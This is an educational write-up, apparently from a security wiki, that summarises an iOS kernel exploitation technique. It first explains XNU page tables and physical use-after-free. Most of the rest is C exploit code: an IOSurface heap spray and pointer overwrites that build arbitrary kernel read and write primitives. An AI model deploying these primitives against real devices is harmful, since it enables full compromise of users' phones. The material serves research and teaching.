# iOS Exploiting
## Physical use-after-free
This is a summary of the post at [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html). Further information about exploits using this technique can be found at [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd).
### Memory management in XNU <a href="#memory-management-in-xnu" id="memory-management-in-xnu"></a>
The **virtual memory address space** for user processes on iOS spans from **0x0 to 0x8000000000**. However, these addresses don’t directly map to physical memory. Instead, the **kernel** uses **page tables** to translate virtual addresses into actual **physical addresses**.
#### Levels of Page Tables in iOS
Page tables are organized hierarchically in three levels:
1. **L1 Page Table (Level 1)**:
   * Each entry here represents a large range of virtual memory.
   * It covers **0x1000000000 bytes** (or **64 GB**) of virtual memory.
2. **L2 Page Table (Level 2)**:
   * An entry here represents a smaller region of virtual memory, specifically **0x2000000 bytes** (32 MB).
   * An L1 entry may point to an L2 table if it can't map the entire region itself.
3. **L3 Page Table (Level 3)**:
   * This is the finest level, where each entry maps a single **16 KB** memory page.
   * An L2 entry may point to an L3 table if more granular control is needed (a quick arithmetic check of these sizes follows this list).
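
As a quick sanity check of those byte counts, here is a minimal sketch (assuming a 16 KB translation granule with 2048 entries per table, which is the layout these numbers correspond to; this is plain arithmetic, not kernel API):

```c
#include <stdint.h>
#include <stdio.h>

int main(void) {
    // Assumed layout: 16 KB pages, 2048 entries per page-table level.
    uint64_t page_size         = 0x4000; // 16 KB, mapped by one L3 entry
    uint64_t entries_per_table = 2048;

    uint64_t l2_entry_covers = page_size * entries_per_table;       // 0x2000000    = 32 MB
    uint64_t l1_entry_covers = l2_entry_covers * entries_per_table; // 0x1000000000 = 64 GB

    printf("L3 entry maps 0x%llx bytes\n", (unsigned long long)page_size);
    printf("L2 entry maps 0x%llx bytes\n", (unsigned long long)l2_entry_covers);
    printf("L1 entry maps 0x%llx bytes\n", (unsigned long long)l1_entry_covers);
    return 0;
}
```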
#### Mapping Virtual to Physical Memory
* **Direct Mapping (Block Mapping)**:
  * Some entries in a page table directly **map a range of virtual addresses** to a contiguous range of physical addresses (like a shortcut).
* **Pointer to Child Page Table**:
  * If finer control is needed, an entry in one level (e.g., L1) can point to a **child page table** at the next level (e.g., L2).
#### Example: Mapping a Virtual Address
Let’s say you try to access the virtual address **0x1000000000**:
1. **L1 Table**:
   * The kernel checks the L1 page table entry corresponding to this virtual address. If it has a **pointer to an L2 page table**, it goes to that L2 table.
2. **L2 Table**:
   * The kernel checks the L2 page table for a more detailed mapping. If this entry points to an **L3 page table**, it proceeds there.
3. **L3 Table**:
   * The kernel looks up the final L3 entry, which points to the **physical address** of the actual memory page (a sketch of this walk follows the list).
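
A minimal sketch of this walk is shown below. The entry encoding and types are purely illustrative (not the real ARM64/XNU descriptor format), using the level sizes described above:

```c
#include <stdbool.h>
#include <stdint.h>

// Illustrative page-table walk for the 3-level layout described above.
// The pte_t encoding is hypothetical, not the real descriptor format.
typedef struct {
    bool     valid;
    bool     is_table; // true: points to a child table; false: block/page mapping
    uint64_t output;   // child table pointer, or physical base address
} pte_t;

typedef struct { pte_t entries[2048]; } page_table_t;

#define L1_SHIFT 36   // one L1 entry covers 0x1000000000 bytes (64 GB)
#define L2_SHIFT 25   // one L2 entry covers 0x2000000 bytes (32 MB)
#define L3_SHIFT 14   // one L3 entry covers a 16 KB page
#define IDX_MASK 0x7FF

// Returns the physical address for va, or 0 if the address is unmapped.
uint64_t translate(page_table_t *l1, uint64_t va) {
    pte_t e = l1->entries[(va >> L1_SHIFT) & IDX_MASK];
    if (!e.valid) return 0;
    if (!e.is_table) // L1 block mapping: one entry covers the whole 64 GB range
        return e.output + (va & ((1ULL << L1_SHIFT) - 1));

    page_table_t *l2 = (page_table_t *)e.output;
    e = l2->entries[(va >> L2_SHIFT) & IDX_MASK];
    if (!e.valid) return 0;
    if (!e.is_table) // L2 block mapping: one entry covers a 32 MB range
        return e.output + (va & ((1ULL << L2_SHIFT) - 1));

    page_table_t *l3 = (page_table_t *)e.output;
    e = l3->entries[(va >> L3_SHIFT) & IDX_MASK];
    if (!e.valid) return 0;
    return e.output + (va & ((1ULL << L3_SHIFT) - 1)); // 16 KB page
}
```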
#### Example of Address Mapping
If you write the physical address **0x800004000** into the first index of the L2 table, then:
* Virtual addresses from **0x1000000000** to **0x1002000000** map to physical addresses from **0x800004000** to **0x802004000**.
* This is a **block mapping** at the L2 level.

Alternatively, if the L2 entry points to an L3 table:
* Each 16 KB page in the virtual address range **0x1000000000 -> 0x1002000000** would be mapped by individual entries in the L3 table (both cases are sketched below).
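
As a quick check of the numbers in this example, the sketch below computes both cases with the illustrative values above (the addresses come from the example, not from real kernel state):

```c
#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint64_t va_base = 0x1000000000ULL; // start of the 32 MB region from the example
    uint64_t pa_base = 0x800004000ULL;  // physical address written into the L2 entry
    uint64_t va      = 0x1001234000ULL; // some address inside that region

    // Case 1: L2 block mapping, a single entry translates the whole 32 MB region.
    uint64_t pa_block = pa_base + (va - va_base);

    // Case 2: the L2 entry points to an L3 table of 16 KB pages instead.
    uint64_t l3_index = (va - va_base) / 0x4000; // which of the 2048 L3 entries
    uint64_t pa_paged = pa_base + l3_index * 0x4000 + (va & 0x3FFF);

    printf("block mapping: VA 0x%llx -> PA 0x%llx\n",
           (unsigned long long)va, (unsigned long long)pa_block);
    printf("L3 entry %llu: VA 0x%llx -> PA 0x%llx (if the L3 entries mirror the block layout)\n",
           (unsigned long long)l3_index, (unsigned long long)va, (unsigned long long)pa_paged);
    return 0;
}
```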
### Physical use-after-free
A **physical use-after-free** (UAF) occurs when:
1. A process **allocates** some memory as **readable and writable**.
2. The **page tables** are updated to map this memory to a specific physical address that the process can access.
3. The process **deallocates** (frees) the memory.
4. However, due to a **bug**, the kernel **forgets to remove the mapping** from the page tables, even though it marks the corresponding physical memory as free.
5. The kernel can then **reallocate this "freed" physical memory** for other purposes, like **kernel data**.
6. Since the mapping wasn’t removed, the process can still **read and write** to this physical memory.

This means the process can access **pages of kernel memory**, which could contain sensitive data or structures, potentially allowing an attacker to **manipulate kernel memory**.
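
Conceptually, the attacker-visible primitive looks like the sketch below: a dangling user mapping (a "PUAF page") that keeps reading and writing whatever the kernel later places in the reclaimed physical page. The `trigger_physical_uaf()` function is a hypothetical placeholder for an actual kernel bug; the rest is ordinary Mach/libc usage:

```c
#include <mach/mach.h>
#include <stdint.h>
#include <stdio.h>

// Hypothetical placeholder: a real exploit would trigger a kernel bug here that
// frees the physical page backing `page` while leaving the user PTE in place.
static void trigger_physical_uaf(void *page) { (void)page; }

int main(void) {
    // Steps 1-2: allocate a readable/writable page; the kernel maps it to physical memory.
    vm_address_t page = 0;
    vm_allocate(mach_task_self(), &page, vm_page_size, VM_FLAGS_ANYWHERE);
    volatile uint64_t *p = (volatile uint64_t *)page;
    *p = 0x4141414141414141ULL; // fault the page in

    // Steps 3-4: the bug frees the physical page but leaves our mapping dangling.
    trigger_physical_uaf((void *)page);

    // Steps 5-6: whatever the kernel reallocates into that physical page is now
    // directly readable (and writable) from userspace through the stale mapping.
    printf("reused page now contains: 0x%llx\n", (unsigned long long)*p);
    return 0;
}
```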
### Exploitation Strategy: Heap Spray
Since the attacker can’t control which kernel data will be allocated into the freed physical pages, they use a technique called **heap spray**:
1. The attacker **creates a large number of IOSurface objects** in kernel memory.
2. Each IOSurface object contains a **magic value** in one of its fields, making it easy to identify.
3. They **scan the freed pages** to check whether any of these IOSurface objects landed on a freed page.
4. When they find an IOSurface object on a freed page, they can use it to **read and write kernel memory**.

More information about this can be found at [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups).
### Step-by-Step Heap Spray Process
1. **Spray IOSurface Objects**: The attacker creates many IOSurface objects with a special identifier ("magic value").
2. **Scan Freed Pages**: They check if any of the objects have been allocated on a freed page.
3. **Read/Write Kernel Memory**: By manipulating fields in the IOSurface object, they gain the ability to perform **arbitrary reads and writes** in kernel memory. This lets them:
   * Use one field to **read any 32-bit value** in kernel memory.
   * Use another field to **write 64-bit values**, achieving a stable **kernel read/write primitive**.

Generate IOSurface objects with the magic value `IOSURFACE_MAGIC` so they can be located later:
```c
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
    if (*nClients >= 0x4000) return;
    for (int i = 0; i < nSurfaces; i++) {
        fast_create_args_t args;
        lock_result_t result;

        size_t size = IOSurfaceLockResultSize;
        args.address = 0;
        args.alloc_size = *nClients + 1;      // encodes the index so the surface can be matched later
        args.pixel_format = IOSURFACE_MAGIC;  // magic value to scan for in freed pages

        IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
        io_connect_t id = result.surface_id;

        (*clients)[*nClients] = id;
        *nClients += 1;
    }
}
```
Search for **`IOSurface`** objects in one freed physical page:
```c
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
    io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
    int nSurfaceIDs = 0;

    for (int i = 0; i < 0x400; i++) {
        spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);

        // Scan the start of each freed (PUAF) page for the sprayed magic value
        for (int j = 0; j < nPages; j++) {
            uint64_t start = puafPages[j];
            uint64_t stop = start + (pages(1) / 16);

            for (uint64_t k = start; k < stop; k += 8) {
                if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
                    info.object = k;                                            // IOSurface seen through the stale mapping
                    info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1]; // recover its surface ID from alloc_size
                    if (self_task) *self_task = iosurface_get_receiver(k);
                    goto sprayDone;
                }
            }
        }
    }

sprayDone:
    // Release every sprayed surface except the one that landed on a freed page
    for (int i = 0; i < nSurfaceIDs; i++) {
        if (surfaceIDs[i] == info.surface) continue;
        iosurface_release(client, surfaceIDs[i]);
    }
    free(surfaceIDs);

    return 0;
}
```
### Achieving Kernel Read/Write with IOSurface
After achieving control over an IOSurface object in kernel memory (mapped to a freed physical page accessible from userspace), we can use it for **arbitrary kernel read and write operations**.

**Key Fields in IOSurface**

The IOSurface object has two crucial fields:
1. **Use Count Pointer**: Allows a **32-bit read**.
2. **Indexed Timestamp Pointer**: Allows a **64-bit write**.

By overwriting these pointers, we redirect them to arbitrary addresses in kernel memory, enabling read/write capabilities.
#### 32-Bit Kernel Read
To perform a read:
1. Overwrite the **use count pointer** to point to the target address minus a 0x14-byte offset.
2. Use the `get_use_count` method to read the value at that address.
```c
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
    uint64_t args[1] = {surfaceID};
    uint32_t size = 1;
    uint64_t out = 0;
    IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
    return (uint32_t)out;
}

uint32_t iosurface_kread32(uint64_t addr) {
    uint64_t orig = iosurface_get_use_count_pointer(info.object);
    iosurface_set_use_count_pointer(info.object, addr - 0x14); // offset by 0x14 so the use-count read lands on addr
    uint32_t value = get_use_count(info.client, info.surface);
    iosurface_set_use_count_pointer(info.object, orig);        // restore the original pointer
    return value;
}
```
#### 64-Bit Kernel Write
To perform a write:
1. Overwrite the **indexed timestamp pointer** to point to the target address.
2. Use the `set_indexed_timestamp` method to write a 64-bit value.
```c
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
    uint64_t args[3] = {surfaceID, 0, value};
    IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}

void iosurface_kwrite64(uint64_t addr, uint64_t value) {
    uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
    iosurface_set_indexed_timestamp_pointer(info.object, addr); // point the timestamp slot at the target address
    set_indexed_timestamp(info.client, info.surface, value);    // the "timestamp" written is the controlled value
    iosurface_set_indexed_timestamp_pointer(info.object, orig); // restore the original pointer
}
```
#### Exploit Flow Recap
1. **Trigger Physical Use-After-Free**: Freed physical pages stay mapped in the process and are available for reuse.
2. **Spray IOSurface Objects**: Allocate many IOSurface objects with a unique "magic value" in kernel memory.
3. **Identify Accessible IOSurface**: Locate an IOSurface on a freed page you control.
4. **Abuse Use-After-Free**: Modify pointers in the IOSurface object to enable arbitrary **kernel read/write** via IOSurface methods.

With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).
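
For instance, a 64-bit read can be assembled from two of the 32-bit reads above; a minimal sketch assuming the `iosurface_kread32` helper shown earlier:

```c
uint64_t iosurface_kread64(uint64_t addr) {
    // Combine two 32-bit reads into one 64-bit value (little-endian kernel).
    uint64_t lo = iosurface_kread32(addr);
    uint64_t hi = iosurface_kread32(addr + 4);
    return (hi << 32) | lo;
}
```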